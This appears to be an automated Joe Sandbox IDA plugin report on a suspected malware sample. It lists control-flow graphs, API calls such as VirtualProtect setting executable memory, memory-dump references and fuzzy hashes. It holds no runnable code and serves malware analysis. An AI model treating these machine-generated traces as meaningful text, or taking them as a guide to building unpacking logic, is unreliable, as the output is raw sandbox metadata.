                                                                    control_flow_graph 0 622021-622068 1 622074-62207f 0->1 2 62206a-62206d 0->2 5 622083-62209e 1->5 3 6220bb-6220c8 2->3 4 62206f-622072 2->4 7 6220cb-6220e5 3->7 4->5 5->3 6 6220a0-6220a6 5->6 8 6220a8-6220b9 6->8 9 6220ee-6220f9 6->9 7->9 10 6220e7-6220ec 7->10 8->7 11 6220fd-62211d 9->11 10->11 12 62213e-622147 11->12 13 62211f-622122 11->13 16 62214a-62215a 12->16 14 622163-62217b 13->14 15 622124-62213c 13->15 18 62217f-62218c 14->18 15->16 16->14 17 62215c-622161 16->17 17->18 19 622197-6221a2 18->19 20 62218e-622195 18->20 21 6221a6-6221c1 19->21 20->21 22 6221d2-6221ed 21->22 23 6221c3-6221c6 21->23 26 6221f0-6221f3 22->26 24 6221c8-6221d0 23->24 25 6221fe-622202 23->25 24->26 27 622204-622266 call 622003 25->27 26->25 28 6221f5-6221fc 26->28 31 622278-622289 27->31 32 622268-62226e 27->32 28->27 35 62228d-622294 31->35 33 622270-622276 32->33 34 6222a6-6222c2 32->34 33->35 37 6222c6-6222cf 34->37 35->34 36 622296-622299 35->36 38 62229b-6222a4 36->38 39 6222f9-622301 36->39 37->39 40 6222d1-6222d7 37->40 38->37 43 622304-62230d 39->43 41 622330-622343 40->41 42 6222d9-6222f7 40->42 44 622345-622350 41->44 42->43 43->41 45 62230f-622312 43->45 46 622361-622374 44->46 48 622352-62235f 44->48 45->46 47 622314-62232e 45->47 49 622376-622389 46->49 47->44 48->49 50 6223aa-6223af 49->50 51 62238b-6223a8 49->51 52 6223b1-6223cc 50->52 51->52 53 6223ce-6223dd 52->53 54 6223df-6223e4 52->54 55 6223e8-6223ee 53->55 54->55 56 6223f0-6223f9 55->56 57 6223fb-622406 55->57 58 622409-622410 56->58 57->58 59 622412-622414 58->59 60 622416-622427 58->60 61 622428-622430 59->61 60->61 62 622432-622435 61->62 63 622437-62244f 61->63 64 622453-622454 62->64 63->64 65 622456-62246c 64->65 66 62246e-622480 64->66 67 622483-6224a1 65->67 66->67 68 6224c3 67->68 69 6224a3-6224c1 67->69 70 6224c6-62254a call 621bee 68->70 69->70 73 62256a-622582 70->73 74 62254c-62254f 70->74 75 622584-62259e 73->75 76 622551-622568 74->76 77 6225b8-6225c5 74->77 75->77 78 6225a0-6225b6 75->78 76->75 79 6225ca-6225e6 77->79 78->79 80 6225f2-6225f7 79->80 81 6225e8-6225eb 79->81 84 6225fa-622609 80->84 82 62261c-622625 81->82 83 6225ed-6225f0 81->83 86 622629-62262d 82->86 83->84 84->82 85 62260b-62260e 84->85 87 622642-622656 85->87 88 622610-62261a 85->88 86->87 89 62262f-622632 86->89 92 622658-62266e 87->92 88->86 90 622681-62269c 89->90 91 622634-622640 89->91 94 62269d-6226b1 90->94 91->92 92->90 93 622670-62267f 92->93 93->94 95 6226b3-6226be 94->95 96 6226c0-6226da 94->96 97 6226dd-62273d call 621f49 VirtualProtect 95->97 96->97 100 622783-622789 97->100 101 62273f-62277a call 621bee AttachConsole 97->101 101->100
                                                                    APIs
                                                                    • VirtualProtect.KERNELBASE(0069A6D8,?,00000040,?), ref: 00622738
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProtectVirtual
                                                                    • String ID: '$S$a
                                                                    • API String ID: 544645111-1060379873
                                                                    • Opcode ID: 6f1daa091e7a208fe3655901d4e82f0afa595d1f9f7ba9b3c9f346e3c7a9c7b3
                                                                    • Instruction ID: d4db0bb55a3d3e7fb33eaddc1bbc563f22be1b8b6a143625c534513bf6ad243a
                                                                    • Opcode Fuzzy Hash: 6f1daa091e7a208fe3655901d4e82f0afa595d1f9f7ba9b3c9f346e3c7a9c7b3
                                                                    • Instruction Fuzzy Hash: CEF1F427934E3B16E7086439AC722F5954BD7AA370FD14333BE229B3F4E35909429A85

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 104 636368-636377 call 635f14 107 6363a0-6363ba call 6363c5 LCMapStringW 104->107 108 636379-63639e LCMapStringEx 104->108 112 6363c0-6363c2 107->112 108->112
                                                                    APIs
                                                                    • LCMapStringEx.KERNELBASE(?,00638F1C,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0063639C
                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00638F1C,?,?,00000000,?,00000000), ref: 006363BA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: String
                                                                    • String ID: R[b
                                                                    • API String ID: 2568140703-1787471655
                                                                    • Opcode ID: 990d1bd3c8b432a52b711ae3c910f70538d3c1b30d078916b11978bed9ff866c
                                                                    • Instruction ID: 5b0905bf86d063a9b8cd7ad870e3f943bb88de4e25f4c9606f6cfdadc52248da
                                                                    • Opcode Fuzzy Hash: 990d1bd3c8b432a52b711ae3c910f70538d3c1b30d078916b11978bed9ff866c
                                                                    • Instruction Fuzzy Hash: F8F0763640016ABBCF126F90DC09EDE3F27EF497A0F059114FA196A120CB32D972AB94

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 113 638e2e-638e47 114 638e49-638e59 call 63044d 113->114 115 638e5d-638e62 113->115 114->115 121 638e5b 114->121 117 638e71-638e97 call 6394ae 115->117 118 638e64-638e6e 115->118 123 63900a-63901b call 626ca2 117->123 124 638e9d-638ea8 117->124 118->117 121->115 126 638eae-638eb3 124->126 127 638ffd 124->127 130 638eb5-638ebe call 627270 126->130 131 638ec8-638ed3 call 633a83 126->131 128 638fff 127->128 133 639001-639008 call 626c84 128->133 139 638ede-638ee2 130->139 141 638ec0-638ec6 130->141 138 638ed5 131->138 131->139 133->123 142 638edb 138->142 139->128 143 638ee8-638eff call 6394ae 139->143 141->142 142->139 143->128 146 638f05-638f17 call 636368 143->146 148 638f1c-638f20 146->148 149 638f22-638f2a 148->149 150 638f3b-638f3d 148->150 151 638f64-638f70 149->151 152 638f2c-638f31 149->152 150->128 153 638f72-638f74 151->153 154 638fef 151->154 155 638fe3-638fe5 152->155 156 638f37-638f39 152->156 157 638f76-638f7f call 627270 153->157 158 638f89-638f94 call 633a83 153->158 159 638ff1-638ff8 call 626c84 154->159 155->133 156->150 160 638f42-638f5c call 636368 156->160 157->159 170 638f81-638f87 157->170 158->159 171 638f96 158->171 159->150 160->155 169 638f62 160->169 169->150 172 638f9c-638fa1 170->172 171->172 172->159 173 638fa3-638fbb call 636368 172->173 173->159 176 638fbd-638fc4 173->176 177 638fe7-638fed 176->177 178 638fc6-638fc7 176->178 179 638fc8-638fda call 63952a 177->179 178->179 179->159 182 638fdc-638fe2 call 626c84 179->182 182->155
                                                                    APIs
                                                                    • __freea.LIBCMT ref: 00638FDD
                                                                      • Part of subcall function 00633A83: HeapAlloc.KERNEL32(00000000,0063A1AA,?,?,0063A1AA,00000220,?,?,?), ref: 00633AB5
                                                                    • __freea.LIBCMT ref: 00638FF2
                                                                    • __freea.LIBCMT ref: 00639002
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __freea$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 85559729-0
                                                                    • Opcode ID: 772ea55a7f6a58bd2b611af7714b48a7e75eff22144aebe16be3f6138f602651
                                                                    • Instruction ID: e705dc3ca7c0b0d38ca5ca77249890c01c6ef9250ec84d90395a1090cb451114
                                                                    • Opcode Fuzzy Hash: 772ea55a7f6a58bd2b611af7714b48a7e75eff22144aebe16be3f6138f602651
                                                                    • Instruction Fuzzy Hash: 6C517C72600316AFEB25AF64CC81EEB3AABEB44790F15012DFD08D7251EA71CD5187E4

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 185 63a3a6-63a3ce call 639ed6 188 63a596-63a597 call 639f47 185->188 189 63a3d4-63a3da 185->189 194 63a59c-63a59e 188->194 190 63a3dd-63a3e3 189->190 192 63a4e5-63a504 call 628240 190->192 193 63a3e9-63a3f5 190->193 204 63a507-63a50c 192->204 193->190 195 63a3f7-63a3fd 193->195 197 63a59f-63a5ad call 626ca2 194->197 199 63a403-63a40f IsValidCodePage 195->199 200 63a4dd-63a4e0 195->200 199->200 203 63a415-63a41c 199->203 200->197 205 63a444-63a451 GetCPInfo 203->205 206 63a41e-63a42a 203->206 207 63a549-63a553 204->207 208 63a50e-63a513 204->208 211 63a453-63a472 call 628240 205->211 212 63a4d1-63a4d7 205->212 209 63a42e-63a43a call 639faa 206->209 207->204 210 63a555-63a57f call 639e98 207->210 213 63a546 208->213 214 63a515-63a51d 208->214 221 63a43f 209->221 225 63a580-63a58f 210->225 211->209 226 63a474-63a47b 211->226 212->188 212->200 213->207 215 63a51f-63a522 214->215 216 63a53e-63a544 214->216 220 63a524-63a52a 215->220 216->208 216->213 220->216 224 63a52c-63a53c 220->224 221->194 224->216 224->220 225->225 227 63a591 225->227 228 63a4a7-63a4aa 226->228 229 63a47d-63a482 226->229 227->188 230 63a4af-63a4b6 228->230 229->228 231 63a484-63a48c 229->231 230->230 234 63a4b8-63a4cc call 639e98 230->234 232 63a49f-63a4a5 231->232 233 63a48e-63a495 231->233 232->228 232->229 235 63a496-63a49d 233->235 234->209 235->232 235->235
                                                                    APIs
                                                                      • Part of subcall function 00639ED6: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00639F01
                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,0063A1ED,?,00000000,?,?,?), ref: 0063A407
                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,0063A1ED,?,00000000,?,?,?), ref: 0063A449
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CodeInfoPageValid
                                                                    • String ID:
                                                                    • API String ID: 546120528-0
                                                                    • Opcode ID: 601f5434413a7cbd45cee8d857fc84592c9c75f793a3eefdfc40e62d16fd2170
                                                                    • Instruction ID: 123f0b4dd3aa81c7a93633e445ba2a436dcee1a18f8eaeff3ee1a46ddcc525dc
                                                                    • Opcode Fuzzy Hash: 601f5434413a7cbd45cee8d857fc84592c9c75f793a3eefdfc40e62d16fd2170
                                                                    • Instruction Fuzzy Hash: A2512471A002458FDB21CFB5C8856EABBE7EF85310F14416ED0C28B352E7B89946DBD2

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 238 639faa-639fcc 239 639fd2-639fe4 GetCPInfo 238->239 240 63a0e5-63a10b 238->240 239->240 241 639fea-639ff1 239->241 242 63a110-63a115 240->242 243 639ff3-639ffd 241->243 244 63a117-63a11d 242->244 245 63a11f-63a125 242->245 243->243 248 639fff-63a012 243->248 249 63a12d-63a12f 244->249 246 63a131 245->246 247 63a127-63a12a 245->247 250 63a133-63a145 246->250 247->249 251 63a033-63a035 248->251 249->250 250->242 252 63a147-63a155 call 626ca2 250->252 253 63a037-63a06e call 638d25 call 63901c 251->253 254 63a014-63a01b 251->254 264 63a073-63a0a8 call 63901c 253->264 256 63a02a-63a02c 254->256 260 63a02e-63a031 256->260 261 63a01d-63a01f 256->261 260->251 261->260 263 63a021-63a029 261->263 263->256 267 63a0aa-63a0b4 264->267 268 63a0c2-63a0c4 267->268 269 63a0b6-63a0c0 267->269 271 63a0d2 268->271 272 63a0c6-63a0d0 268->272 270 63a0d4-63a0e1 269->270 270->267 273 63a0e3 270->273 271->270 272->270 273->252
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(E8458D00,?,0063A1F9,0063A1ED,00000000), ref: 00639FDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Info
                                                                    • String ID:
                                                                    • API String ID: 1807457897-0
                                                                    • Opcode ID: 51b2a6c4908ee125e7628effe40ad356afb1827f0b51d6850b0f2910d9891468
                                                                    • Instruction ID: b671dce29a1c8b1149b2a390ad5341b460049c59fba5940dad8089cb2ea507d5
                                                                    • Opcode Fuzzy Hash: 51b2a6c4908ee125e7628effe40ad356afb1827f0b51d6850b0f2910d9891468
                                                                    • Instruction Fuzzy Hash: 05517D719041589EDB218F68CC80AF67BBAEB56308F2405EDE0DAC7142C3759D46EF61
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +4#$-]45$-ms$2- #$6"k~$7.?j$8@[*$9]`V$G>q$h2=?$hw^
                                                                    • API String ID: 0-103661567
                                                                    • Opcode ID: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
                                                                    • Instruction ID: 7278561a69c3953a9f61c3d9a86b6ce4d469d524c31ba5750c99991a8d1af1db
                                                                    • Opcode Fuzzy Hash: 7901161aae9f9da5d229c51b76c7ce90f08aceb943cd7e8fa9e8ea12c19d518a
                                                                    • Instruction Fuzzy Hash: 2483317241E7D61EC727CB308AB65A17F66FE136103198ACFC4C18F5B3C2549A1AE366

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 2363 63c9e9-63ca3f call 634eb1 * 2 2368 63ca41-63ca44 2363->2368 2369 63ca60-63ca67 2363->2369 2368->2369 2370 63ca46-63ca5e call 63c988 2368->2370 2371 63cad7-63cadb 2369->2371 2372 63ca69-63ca6c 2369->2372 2370->2369 2373 63caee-63cafe GetUserDefaultLCID 2371->2373 2374 63cadd-63cae0 2371->2374 2372->2371 2376 63ca6e-63ca72 2372->2376 2378 63cb01 2373->2378 2374->2373 2377 63cae2-63caec call 63c327 2374->2377 2380 63ca84-63ca88 call 63c40d 2376->2380 2381 63ca74-63ca77 2376->2381 2377->2378 2384 63cb03-63cb07 2378->2384 2387 63ca8d-63ca92 2380->2387 2381->2380 2385 63ca79-63ca82 call 63c372 2381->2385 2388 63cb09 2384->2388 2389 63cb1c-63cb38 call 63c814 2384->2389 2385->2387 2392 63cb1a 2387->2392 2393 63ca98-63cab1 call 63c988 2387->2393 2394 63cb0b-63cb19 call 626ca2 2388->2394 2389->2388 2401 63cb3a-63cb46 IsValidCodePage 2389->2401 2392->2389 2393->2378 2403 63cab3-63cab9 2393->2403 2401->2388 2402 63cb48-63cb55 IsValidLocale 2401->2402 2402->2388 2404 63cb57-63cb5c 2402->2404 2405 63cacb-63cacf call 63c40d 2403->2405 2406 63cabb-63cabe 2403->2406 2407 63cb60-63cb76 call 636329 2404->2407 2408 63cb5e 2404->2408 2413 63cad4-63cad5 2405->2413 2406->2405 2409 63cac0-63cac9 call 63c372 2406->2409 2416 63cbd6-63cbd9 2407->2416 2417 63cb78-63cb9d call 636329 GetLocaleInfoW 2407->2417 2408->2407 2409->2413 2413->2384 2416->2394 2417->2388 2420 63cba3-63cbbc GetLocaleInfoW 2417->2420 2420->2388 2421 63cbc2-63cbd3 call 63ff44 2420->2421 2421->2416
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0063CAF5
                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0063CB3E
                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0063CB4D
                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0063CB95
                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0063CBB4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                    • String ID: ||d
                                                                    • API String ID: 415426439-1811930013
                                                                    • Opcode ID: 008daa0511afdd81eaf4e4e97e2406a1e41bad61c20bac3b96d3a441ec06f113
                                                                    • Instruction ID: 9cca1eec71b81a9293944e696f0df972e4ed842e1fe0c3ff2123d096d96291ae
                                                                    • Opcode Fuzzy Hash: 008daa0511afdd81eaf4e4e97e2406a1e41bad61c20bac3b96d3a441ec06f113
                                                                    • Instruction Fuzzy Hash: 32516E72A00219ABDB10DFA5DC46AEAB7BAFF09710F144469F911F7290E7709A04CBE5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __floor_pentium4
                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                    • API String ID: 4168288129-2761157908
                                                                    • Opcode ID: 02c98f535dc4d4497b3986de27da475f19f7fe4b5ed185c7709bbfdf8f807088
                                                                    • Instruction ID: 94c5dae543434d6c77e35d71dee383ccafc90829e89fb31addfbb955bce6823c
                                                                    • Opcode Fuzzy Hash: 02c98f535dc4d4497b3986de27da475f19f7fe4b5ed185c7709bbfdf8f807088
                                                                    • Instruction Fuzzy Hash: 01D23A71E082298FDB65CF28DD407EAB7B6EB45304F1441EAD40EE7280E775AE858F91
                                                                    APIs
                                                                      • Part of subcall function 00634EB1: GetLastError.KERNEL32(?,00000008,00639482), ref: 00634EB5
                                                                      • Part of subcall function 00634EB1: SetLastError.KERNEL32(00000000,0064C480,00000024,00630419), ref: 00634F57
                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00631848,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0063C146
                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00631848,?,?,?,00000055,?,-00000050,?,?), ref: 0063C171
                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0063C2D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                    • String ID: utf8$||d
                                                                    • API String ID: 607553120-1839698243
                                                                    • Opcode ID: 5fb0c7674a76c917e2503e0194303992901be1f16c4199d346aaf7a34d625780
                                                                    • Instruction ID: 4be4fcf57ce520529c0923ea8df680e87751a45663921c8f0d4e78727a4ed25a
                                                                    • Opcode Fuzzy Hash: 5fb0c7674a76c917e2503e0194303992901be1f16c4199d346aaf7a34d625780
                                                                    • Instruction Fuzzy Hash: 29710B31A00702AADB24BB75DC42FE773AAEF45720F14442DF505E7281EBB4EA4197E4
                                                                    APIs
                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0063CB32,00000002,00000000,?,?,?,0063CB32,?,00000000), ref: 0063C8AD
                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,0063CB32,00000002,00000000,?,?,?,0063CB32,?,00000000), ref: 0063C8D6
                                                                    • GetACP.KERNEL32(?,?,0063CB32,?,00000000), ref: 0063C8EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_Aew8SXjXEb.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: InfoLocale
                                                                    • String ID: ACP$OCP
                                                                    • API String ID: 2299586839-711371036
                                                                    • Opcode ID: 543877faf9e628753ed1e5352648cf7417359ec370cad3ef16d5c7c91b2cb1d4
                                                                    • Instruction ID: 1968e0f415da67660986e372adde3837c32202fd0b72b36b5ff9bd02eb78c096
                                                                    • Opcode Fuzzy Hash: 543877faf9e628753ed1e5352648cf7417359ec370cad3ef16d5c7c91b2cb1d4
                                                                    • Instruction Fuzzy Hash: 05215E22A00101AADB249F65D901AD77AA7AF54B70F568564F90AFB311EB32DF41D3D0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1544181606.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.1544163593.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544204622.0000000000643000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544221013.000000000064D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544255654.000000000069A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544268791.000000000069B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1544284153.000000000069C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
